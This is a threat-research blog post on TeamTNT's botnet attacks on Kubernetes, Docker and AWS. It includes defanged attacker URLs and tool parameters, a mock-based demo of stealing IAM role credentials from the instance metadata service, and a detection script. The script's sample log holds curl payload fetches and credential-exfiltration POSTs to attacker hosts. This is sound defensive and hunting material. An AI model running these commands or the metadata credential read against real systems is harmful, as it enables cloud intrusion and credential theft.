# Botnet Deploys Cloud and Container Attack Techniques

**[cadosecurity.com/post/botnet-deploys-cloud-and-container-attack-techniques](https://www.cadosecurity.com/post/botnet-deploys-cloud-and-container-attack-techniques)**

January 18, 2021

We recently identified a campaign that deploys cloud and container specific attack tools. It is [the latest iteration of the malware we reported on back in August 2020](https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials). Earlier in 2021 we saw reports by [AT&T](https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader) and [Trend Micro](https://web.archive.org/web/20210109061251/https://www.trendmicro.com/en_us/research/21/a/malicious-shell-script-steals-aws-docker-credentials.html) on a related campaign from the attackers known as TeamTNT. More recently, independent researchers ([1](https://twitter.com/Suprn8/status/1349938276623384576), [2](https://twitter.com/r3dbU7z/status/1350195371952267264)) and [Tencent](https://security.tencent.com/index.php/blog/msg/175) have reviewed further activity. Whilst we classify this as a botnet because of its centralised command and control, we note that [TeamTNT themselves prefer the term "spreading script"](https://twitter.com/HildeTNT/status/1350698045458018304).

Below is a quick outline of the significant updates TeamTNT made to their crypto-mining campaign last week. The first obvious update is the logo deployed: "TeamTNT feat Borg – The Docker Gatling Gun".

As before, the core of the botnet scans for and compromises open Kubernetes systems, but there have been a number of updates. The AWS credential theft is significantly more sophisticated than the version we found back in August 2020, and builds on [the later version reported on by Trend Micro](https://www.zdnet.com/article/a-crypto-mining-botnet-is-now-stealing-docker-and-aws-credentials/). The script can now steal the credentials of AWS IAM roles, reading them both from local credential files and from the AWS instance metadata URL. It posts the stolen credentials to one of two URLs:

- http://the.borg[.]wtf/incoming/access_data/aws.php
- http://45.9.150[.]36/incoming/access_data/aws.php

Much of the exploitation chain and toolset remains the same as in previous versions: a number of scanners, IRC backdoors and reverse shells used to maintain access. There are some new cloud and container specific tricks, though. TeamTNT now deploy:

- [Tmate](https://tmate.io/), a simple application for sharing terminals, which gives the attackers another method of maintaining access. It is installed from http://45.9.150[.]36/pwn/t.sh.
- [Break Out The Box (BOTB)](https://github.com/brompwnie/botb), a penetration testing tool for cloud and containerised environments, continuing an impressive arsenal of capabilities. The parameters BOTB is called with show that the attackers now also try to steal credentials from Google Cloud Platform systems:

  `-scrape-gcp=true -recon=true -metadata=true -find-http=true -find-sockets=true -find-docker=true -pwnKeyctl=true -k8secrets=true`

  Per BOTB's own documentation, `-scrape-gcp` and `-metadata` query the cloud metadata endpoints, `-k8secrets` dumps Kubernetes secrets, `-find-docker` and `-find-sockets` look for a reachable Docker socket, and `-pwnKeyctl` reads secrets from the kernel keyring. BOTB is installed from https://teamtnt[.]red/set/up/bob.php.
- [Peirates](https://www.inguardians.com/peirates/), a penetration testing tool for Kubernetes. It is installed from https://teamtnt[.]red/set/up/pei.php.

**Conclusion**

TeamTNT have significantly improved both the quality and scope of their attacks since our first report back in August 2020. They have displayed a high pace of improvement and an array of cloud and container specific attacks. Cado Security continues to see a rise in attackers developing tools and techniques that specifically target cloud and container environments, and it is important that organisations remain vigilant and continue to adapt to these new threats.
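The credential theft from the AWS metadata URL described above relies on the instance metadata service answering plain GETs. The following is an added example, not code from the Cado post or from TeamTNT's scripts: it runs the two-request pattern against an in-process mock of 169.254.169.254, first on an instance that still accepts IMDSv1 and then on one configured with `HttpTokens=required`, and shows the IMDSv2 token exchange that legitimate clients use instead. The role name, key values and session token are constructed for the demo.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample values standing in for what a real instance would return.
ROLE_NAME = "example-instance-role"
FAKE_CREDS = {"Code": "Success", "Type": "AWS-HMAC", "AccessKeyId": "ASIAEXAMPLEKEY",
              "SecretAccessKey": "example-secret", "Token": "example-session-token",
              "Expiration": "2021-01-18T12:00:00Z"}
SESSION_TOKEN = "example-imdsv2-token"
CRED_PATH = "/latest/meta-data/iam/security-credentials/"

# Ignore any proxy configured in the environment so the calls stay local.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class MockIMDS(BaseHTTPRequestHandler):
    """Minimal stand-in for 169.254.169.254. require_token=False behaves like the
    default (IMDSv1 still accepted); True behaves like HttpTokens=required."""
    require_token = False

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_PUT(self):
        # IMDSv2 step 1: PUT /latest/api/token with a TTL header yields a session token.
        if self.path == "/latest/api/token" and "X-aws-ec2-metadata-token-ttl-seconds" in self.headers:
            self._reply(200, SESSION_TOKEN)
        else:
            self._reply(404, "")

    def do_GET(self):
        if self.require_token and self.headers.get("X-aws-ec2-metadata-token") != SESSION_TOKEN:
            self._reply(401, "")  # what a token-less GET receives on an IMDSv2-only instance
        elif self.path == CRED_PATH:
            self._reply(200, ROLE_NAME)  # listing: one attached role name per line
        elif self.path == CRED_PATH + ROLE_NAME:
            self._reply(200, json.dumps(FAKE_CREDS))  # temporary STS credentials for the role
        else:
            self._reply(404, "")

    def _reply(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)


def start_mock(require_token):
    handler = type("Handler", (MockIMDS,), {"require_token": require_token})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_port


def _get(url, headers=None):
    return OPENER.open(urllib.request.Request(url, headers=headers or {}), timeout=3).read().decode()


def steal_role_creds_v1(base):
    """The two unauthenticated GETs a credential-stealing script relies on.
    Returns the credential dict, or None when the instance only accepts IMDSv2."""
    try:
        role = _get(base + CRED_PATH).strip()
        return json.loads(_get(base + CRED_PATH + role))
    except urllib.error.HTTPError:
        return None


def fetch_role_creds_v2(base):
    """Same reads, preceded by the IMDSv2 token PUT and sent with the token header."""
    req = urllib.request.Request(base + "/latest/api/token", method="PUT",
                                 headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    token = OPENER.open(req, timeout=3).read().decode()
    hdr = {"X-aws-ec2-metadata-token": token}
    role = _get(base + CRED_PATH, hdr).strip()
    return json.loads(_get(base + CRED_PATH + role, hdr))


def run_demo():
    """Returns (v1 read on a v1-tolerant instance, v1 read on a v2-only instance,
    v2 read on a v2-only instance)."""
    lax, lax_url = start_mock(require_token=False)
    strict, strict_url = start_mock(require_token=True)
    try:
        return (steal_role_creds_v1(lax_url), steal_role_creds_v1(strict_url),
                fetch_role_creds_v2(strict_url))
    finally:
        for srv in (lax, strict):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    v1_open, v1_blocked, v2_ok = run_demo()
    print("IMDSv1-tolerant instance, token-less read:", v1_open["AccessKeyId"])
    print("IMDSv2-only instance, token-less read:", v1_blocked)
    print("IMDSv2-only instance, token read:", v2_ok["AccessKeyId"])
```

On a real instance the switch is `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`. Requiring tokens defeats the plain-GET pattern, and a hop limit of 1 means the token PUT response never reaches a container with its own network namespace, which is the case that matters for the Docker and Kubernetes targets in this campaign. The caveat is that any workload that legitimately needs role credentials from inside such a container (rather than via a mounted credential or an IAM-roles-for-service-accounts style mechanism) will break in the same way.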
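To turn the indicators and tool list above into something hunt-ready, here is an added example (not code from the Cado post, and not part of the Cado product) that runs over a few constructed process-execution and network records. The record format (`<timestamp> <type> key=value ... cmd=<command line>`) is invented for the demo, the binary names `botb` and `peirates` are an assumption about what the downloaded tools are saved as, and the log lines are constructed rather than captured. It flags contact with the staging and exfiltration URLs, reads of the IMDS role-credential path, and execution of Tmate, BOTB and Peirates, recording which of BOTB's scraping switches were set.

```python
import re
from collections import namedtuple

# Indicators from the post, with the defanging brackets removed so they match log text.
IOC_HOSTS = {"teamtnt.red", "borg.wtf", "45.9.150.36"}
IOC_PATHS = {
    "/incoming/access_data/aws.php": "aws-credential-exfil",
    "/pwn/t.sh": "tmate-install",
    "/set/up/bob.php": "botb-install",
    "/set/up/pei.php": "peirates-install",
}
IMDS_HOST = "169.254.169.254"
IMDS_CRED_PATH = "/latest/meta-data/iam/security-credentials/"
TOOL_NAMES = {"botb", "peirates", "tmate"}  # assumed on-disk names of the deployed tools
# BOTB switches from the post that indicate credential/secret scraping rather than plain recon.
BOTB_SCRAPE_FLAGS = {"-scrape-gcp", "-metadata", "-k8secrets", "-find-docker", "-find-sockets", "-pwnKeyctl"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)(?::\d+)?(/[^\s\"']*)?")
Finding = namedtuple("Finding", "line_no kind detail")

# Constructed sample records in the invented "<ts> <type> key=value ... cmd=<rest>" format.
SAMPLE_LOG = """\
2021-01-15T10:02:11Z exec pid=4123 user=root cmd=curl -sLk http://45.9.150.36/pwn/t.sh -o /tmp/t.sh
2021-01-15T10:02:12Z exec pid=4130 user=root cmd=/usr/bin/tmate -S /tmp/tmate.sock new-session -d
2021-01-15T10:02:20Z exec pid=4141 user=root cmd=curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
2021-01-15T10:02:25Z net pid=4150 method=POST url=http://the.borg.wtf/incoming/access_data/aws.php
2021-01-15T10:02:30Z exec pid=4160 user=root cmd=/tmp/botb -scrape-gcp=true -recon=true -metadata=true -find-http=true -find-sockets=true -find-docker=true -pwnKeyctl=true -k8secrets=true
2021-01-15T10:02:31Z exec pid=4161 user=root cmd=/tmp/peirates
2021-01-15T10:03:00Z exec pid=4200 user=app cmd=curl -s https://pypi.org/simple/requests/
"""


def parse_record(line):
    """Split a record into (type, fields); everything after ' cmd=' is the command line."""
    _ts, rtype, rest = line.split(" ", 2)
    fields = {}
    if " cmd=" in " " + rest:
        head, cmd = (" " + rest).split(" cmd=", 1)
        fields["cmd"] = cmd
        rest = head
    for kv in rest.split():
        key, _, value = kv.partition("=")
        fields[key] = value
    return rtype, fields


def ioc_host(host):
    return host in IOC_HOSTS or any(host.endswith("." + h) for h in IOC_HOSTS)


def hunt(lines):
    findings = []
    for n, line in enumerate(lines, 1):
        rtype, fields = parse_record(line)
        # Any URL touching the IOC infrastructure, classified by path where the post names one,
        # plus reads of the IMDS role-credential path (the metadata root itself is too noisy to flag).
        for m in URL_RE.finditer(line):
            host, path = m.group(1), m.group(2) or "/"
            if ioc_host(host):
                findings.append(Finding(n, IOC_PATHS.get(path, "ioc-contact"), host + path))
            elif host == IMDS_HOST and path.startswith(IMDS_CRED_PATH):
                findings.append(Finding(n, "imds-role-credential-read", "pid " + fields.get("pid", "?")))
        # Execution of the deployed tools; for BOTB, record which scraping switches were set.
        if rtype == "exec":
            argv = fields.get("cmd", "").split()
            name = argv[0].rsplit("/", 1)[-1] if argv else ""
            if name in TOOL_NAMES:
                flags = [a.partition("=")[0] for a in argv[1:] if a.partition("=")[0] in BOTB_SCRAPE_FLAGS]
                findings.append(Finding(n, "tool-exec", " ".join([name] + flags)))
    return findings


def hunt_sample():
    return hunt(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in hunt_sample():
        print("line %d: %-26s %s" % f)
```

The host match is suffix-based so that `the.borg[.]wtf` is caught by the `borg[.]wtf` indicator, and the IMDS check deliberately keys on the `iam/security-credentials` path rather than on every request to 169.254.169.254, since agents and SDKs read the metadata root constantly. When adapting this to real auditd, eBPF or proxy logs, only `parse_record` should need to change.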
Cado Security specialises in providing tooling and techniques that allow organisations to threat hunt and investigate cloud and container systems. If you are interested in knowing more, please don't hesitate to [reach out; our pilot program is now open](https://www.cadosecurity.com/demo).

**Indicators of Compromise**

- teamtnt[.]red
- borg[.]wtf
- 45.9.150[.]36

**About The Author**

Chris Doman

Chris is well known for building the popular threat intelligence portal [ThreatCrowd](https://www.threatcrowd.org/), which subsequently merged into the [AlienVault Open Threat Exchange](https://otx.alienvault.com/), later acquired by AT&T. Chris is an industry leading threat researcher and has published a number of widely read articles and papers on targeted cyber attacks. His research on topics such as the North Korean government's [crypto-currency theft schemes](https://www.wsj.com/articles/in-north-korea-hackers-mine-cryptocurrency-abroad-1515420004), and China's attacks against dissident websites, has been widely discussed in the media. He has also given interviews to print, radio and TV such as [CNN and BBC News](https://www.youtube.com/watch?v=z_0oV_hsc08).

**About Cado Security**

Cado Security provides the cloud investigation platform that empowers security teams to respond to threats at cloud speed. By automating data capture and processing across cloud and container environments, Cado Response delivers forensic-level detail and context to simplify cloud investigation and response. Backed by Blossom Capital and Ten Eleven Ventures, Cado Security has offices in the United States and United Kingdom. For more information, please visit [https://www.cadosecurity.com/](https://www.cadosecurity.com/) or follow us on Twitter [@cadosecurity](https://twitter.com/CadoSecurity).